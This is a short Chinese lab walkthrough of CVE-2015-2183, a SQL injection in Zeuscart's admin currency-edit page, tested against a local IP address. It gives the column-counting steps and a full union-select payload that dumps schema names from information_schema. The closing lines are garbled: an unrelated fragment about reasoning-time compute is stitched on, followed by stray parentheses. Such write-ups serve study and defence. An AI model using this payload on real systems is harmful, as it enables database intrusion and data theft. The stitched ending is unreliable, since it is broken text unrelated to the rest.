CVE-2015-2183 Zeuscart SQL注入漏洞
主页
访问/admin/进行登录
访问:http://192.168.1.3/admin/?do=editcurrency&cid=1
单引号测试,发现页面发生变化,进一步测试
order by 5 ,页面正常,order by 6时页面发生变化,说明有五个字段
联合查询试试,2和4回显
查询当前用户和版本
查询当前所用数据库:cid=1+union+select+1,group_concat(schema_name),3,4,5+from+information_schema.schemata±-+
看一下相关代码,将cid字段直接拼接到sql语句中
如何通过“思考时间”(即推理时的计算资源)提升推理能力)
)
)
做法!)